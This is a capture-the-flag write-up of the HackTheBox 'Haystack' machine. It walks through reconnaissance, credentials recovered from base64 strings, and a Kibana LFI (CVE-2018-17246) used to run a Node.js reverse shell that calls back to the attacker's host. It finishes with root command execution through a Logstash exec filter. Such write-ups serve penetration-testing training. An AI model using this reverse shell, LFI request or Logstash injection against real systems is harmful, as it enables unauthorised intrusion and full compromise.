
HackTheBox: Haystack

The first step, as is almost always the case, is to run an Nmap scan against the host to discover which services are running:

root@kali:~/Documents/haystack# nmap -A -oN scan 10.10.10.115
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 17:23 UTC
Nmap scan report for 10.10.10.115
Host is up (0.017s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
|   256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_  256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp   open  http    nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open  http    nginx 1.12.2
| http-methods: 
|_  Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (92%), Linux 3.10 - 4.11 (90%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   16.13 ms 10.10.12.1
2   17.06 ms ip-10-10-10-115.eu-west-2.compute.internal (10.10.10.115)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.78 seconds

From the output we can see that SSH is running on port 22, with nginx web servers on ports 80 and 9200. When you browse to the page on port 80 you are greeted with a large image of a needle in a haystack. I downloaded this image and ran strings on the file.

root@kali:~/Downloads/haystack# strings needle.jpg
O'bu
N{M3
:t6Q6
STW5
*Oo!;.o|?>
.n2FrZ
rrNMz
#=pMr
BN2I
,'*'
I$f2/<-iy
bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==

At the bottom of the strings output you can see a long string which appears to be encoded with base64.
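
As a side note, candidate strings like this can also be pulled out of the strings output automatically rather than spotted by eye. A minimal sketch, assuming the interesting strings are reasonably long and use only the base64 alphabet:

strings needle.jpg | grep -E '^[A-Za-z0-9+/]{20,}={0,2}$'    # keep only long base64-looking lines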

root@kali:~/Downloads/haystack# echo 'bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==' | base64 -d
la aguja en el pajar es "clave"

I then browsed to port 9200 at http://10.10.10.115:9200. It returned some JSON-formatted data which indicates that it is hosting an Elasticsearch instance:

{
  "name" : "iQEYHgS",
  "cluster_name" : "elasticsearch",
  "cluster_uuid" : "pjrX7V_gSFmJY-DxP4tCQg",
  "version" : {
    "number" : "6.4.2",
    "build_flavor" : "default",
    "build_type" : "rpm",
    "build_hash" : "04711c2",
    "build_date" : "2018-09-26T13:34:09.098244Z",
    "build_snapshot" : false,
    "lucene_version" : "7.4.0",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  },
  "tagline" : "You Know, for Search"
}
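
As an aside, besides the _aliases endpoint used below, Elasticsearch also exposes a human-readable index listing via its _cat API, which shows document counts and sizes as well:

curl 'http://10.10.10.115:9200/_cat/indices?v'    # tabular list of indices with doc counts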

I then browsed to http://10.10.10.115:9200/_aliases to view the indices which are being used:

{".kibana":{"aliases":{}},"bank":{"aliases":{}},"quotes":{"aliases":{}}}

As you can see from the output, there are three indices: .kibana, bank and quotes.

Now the next step I performed in quite a messy way; there is probably a much cleaner way of doing it (one option is sketched after the output below). I knew from the decoded base64 string in the image that the word of interest is ‘clave’ (the decoded message is Spanish for “the needle in the haystack is ‘clave’”, i.e. “key”). So I browsed to each index in turn and used CTRL+F to search for the word clave. I got two results in the quotes index, both containing additional base64 strings:

{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}
{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}

I then decoded these strings using the same method as before.

root@kali:~/Downloads/haystack# echo 'cGFzczogc3BhbmlzaC5pcy5rZXk=' | base64 -d
pass: spanish.is.key
root@kali:~/Downloads/haystack# echo 'dXNlcjogc2VjdXJpdHkg' | base64 -d
user: security

So we now have login credentials which allow us to access the machine via SSH. From the indices we can also tell that Kibana is very likely installed. Once logged in via SSH, I checked out the Kibana config file to see how it has been set up.

root@kali:~/Downloads/haystack# ssh security@10.10.10.115
security@10.10.10.115's password: 
Last login: Tue Aug  6 15:52:37 2019 from 10.10.14.39
[security@haystack ~]$ cat /etc/kibana/kibana.yml 
# Kibana is served by a back end server. This setting specifies the port to use.
server.port: 5601

# Specifies the address to which the Kibana server will bind. IP addresses and host names are both valid values.
# The default is 'localhost', which usually means remote machines will not be able to connect.
# To allow connections from remote users, set this parameter to a non-loopback address.
server.host: "127.0.0.1"

We can see that it is running on port 5601 but is bound only to localhost, so it isn’t accessible remotely. After a bit of Googling I found an LFI vulnerability (CVE-2018-17246) in this version of Kibana that we can use to get code execution as the kibana user.

The first stage in exploiting the vulnerability is to upload a JavaScript reverse shell that can be executed by Kibana. I hosted the following JavaScript file on my Kali machine via Python's SimpleHTTPServer, of course making sure to change the IP address to match my OpenVPN IP.

EnlighterJSRAW" data-enlighter-language="js">(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
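
For completeness, serving the file from the Kali machine is a one-liner with Python's built-in web server; port 8000 here is chosen to match the curl command below (use the http.server module instead if you are on Python 3):

python -m SimpleHTTPServer 8000     # Python 2
python3 -m http.server 8000         # Python 3 equivalent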

I then downloaded the file to the Haystack machine using curl.

[security@haystack ~]$ cd /tmp
[security@haystack tmp]$  curl http://10.10.13.111:8000/test.js --output jim.js

The next step is to start a netcat listener on the Kali machine to receive the connection from the reverse shell once it is run. This listener needs to run on port 1337, as specified in the JavaScript file.

root@kali:~/Downloads# nc -lvp 1337 
listening on [any] 1337 ...

I then sent the GET request to Kibana, as described on the GitHub page for the LFI vulnerability, using curl. The request has to be made from localhost as Kibana is only accessible locally.

[security@haystack tmp]$ curl -X GET 'http://127.0.0.1:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../tmp/jim.js'

Looking back at the listener, we can see that the connection has been made. Typing ls lists the current directory successfully.

root@kali:~/Downloads# nc -lvp 1337
listening on [any] 1337 ...
10.10.10.115: inverse host lookup failed: Unknown host
connect to [10.10.13.111] from (UNKNOWN) [10.10.10.115] 56236
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

I upgraded to a more user-friendly Bash shell using Python. You can also see from the whoami output that we are now accessing the machine as the kibana user:

python -c 'import pty; pty.spawn("/bin/bash")' 

bash-4.2$ whoami
whoami
kibana

We now need to find a process that can be abused in some way to allow privilege escalation to root. By running ps aux we can see all running processes, and it is apparent from this that Logstash is running as root.

[security@haystack ~]$ ps aux | grep logstash
root       6147 22.4  7.5 2658288 293184 ?      SNsl 16:18   0:33 /bin/java -Xms500m -Xmx500m -XX:+UseParNewGC -XX:+UseConcMarkSweepGC -XX:CMSInitiatingOccupancyFraction=75 -XX:+UseCMSInitiatingOccupancyOnly -Djava.awt.headless=true -Dfile.encoding=UTF-8 -Djruby.compile.invokedynamic=true -Djruby.jit.threshold=0 -XX:+HeapDumpOnOutOfMemoryError -Djava.security.egd=file:/dev/urandom -cp /usr/share/logstash/logstash-core/lib/jars/animal-sniffer-annotations-1.14.jar:/usr/share/logstash/logstash-core/lib/jars/commons-codec-1.11.jar:/usr/share/logstash/logstash-core/lib/jars/commons-compiler-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/error_prone_annotations-2.0.18.jar:/usr/share/logstash/logstash-core/lib/jars/google-java-format-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/gradle-license-report-0.7.1.jar:/usr/share/logstash/logstash-core/lib/jars/guava-22.0.jar:/usr/share/logstash/logstash-core/lib/jars/j2objc-annotations-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-annotations-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-core-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-databind-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-dataformat-cbor-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/janino-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/jruby-complete-9.1.13.0.jar:/usr/share/logstash/logstash-core/lib/jars/jsr305-1.3.9.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-api-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-core-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-slf4j-impl-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/logstash-core.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.commands-3.6.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.contenttype-3.4.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.expressions-3.4.300.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.filesystem-1.3.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.jobs-3.5.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.resources-3.7.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.runtime-3.7.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.app-1.3.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.common-3.6.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.preferences-3.4.1.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.registry-3.5.101.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.jdt.core-3.10.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.osgi-3.7.1.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.text-3.5.101.jar:/usr/share/logstash/logstash-core/lib/jars/slf4j-api-1.7.25.jar org.logstash.Logstash --path.settings /etc/logstash

I took a look at the logstash configuration:

bash-4.2$ cd /etc/logstash/conf.d/
bash-4.2$ ls
ls
filter.conf  input.conf  output.conf
bash-4.2$ cat output.conf
cat output.conf 
output {
  if [type] == "execute" {
    stdout { codec => json }
    exec {
      command => "%{comando} &"
    }
  }
}
bash-4.2$ cat input.conf 
cat input.conf 
input {
  file {
    path => "/opt/kibana/logstash_*"
    start_position => "beginning"
    sincedb_path => "/dev/null"
    stat_interval => "10 second"
    type => "execute"
    mode => "read"
  }
}
bash-4.2$ cat filter.conf 
cat filter.conf 
filter {
  if [type] == "execute" {
    grok {
      match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
    }
  }
}
bash-4.2$

You can see that Logstash is configured with three files: input.conf, filter.conf and output.conf.

input.conf shows that it reads data from files matching /opt/kibana/logstash_*, checking for new content every 10 seconds.

filter.conf shows that each message is matched against the grok pattern Ejecutar\s*comando\s*:, with everything after it captured into the field comando.

output.conf shows that, for events of type execute, the contents of the comando field are then run as a shell command.

With this information we now know that we need to provide data in /opt/kibana/logstash_* which includes a command we want to run. That command will be executed by Logstash, which in turn is running as root.
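
Putting those three files together, a minimal payload would be a single line matching the grok pattern, written to a file the kibana user can create under /opt/kibana. A sketch based purely on the config above (the file name logstash_pwn and the output path /tmp/rootflag are arbitrary, and as described below I actually sprayed several formats rather than relying on any single one):

# one line in the "Ejecutar comando: <command>" form that filter.conf captures into %{comando}
echo 'Ejecutar comando: cat /root/root.txt > /tmp/rootflag' > /opt/kibana/logstash_pwn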

Logstash is very new to me, and I wasn't completely sure of the format needed in the log file for a command to be captured by the filter and executed. Because of this I went for the spray-and-pray technique, loading the file with an assortment of possible formats to be processed line by line until one worked. The file can be seen here:

comando: cat /root/root.txt > /tmp/good
cat /root/root.txt > /tmp/good2
Ejecutar comando: cat /root/root.txt > /tmp/good3
GREEDYDATA:whoami > cat /root/root.txt > /tmp/good4
Ejecutar\s*comando\s*: cat /root/root.txt > /tmp/good5

I hosted this file on my Kali machine through Python's SimpleHTTPServer and downloaded it to the /opt/kibana directory on the Haystack machine.

bash-4.2$ cd /opt/kibana/

curl 10.10.14.27:8000/logstash_i --output logstash_i
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   180  100   180    0     0   2964      0 --:--:-- --:--:-- --:--:--  2950

I waited the 10 seconds configured in input.conf for the file to be processed, then checked the /tmp directory to see if any of my output files had been created.

bash-4.2$ ls /tmp
good3

As you can see, the good3 file has been written to /tmp, so the "Ejecutar comando:" line is the one that was picked up. I did try recreating the logstash_i file with just that line, but for some reason it didn't work, so I'm still not 100% sure exactly what the format should be; all I know is that what I used worked, even though it is a bit messy. I then ran cat on the file to view the flag and complete the machine.

bash-4.2$ cat /tmp/good3
[REDACTED]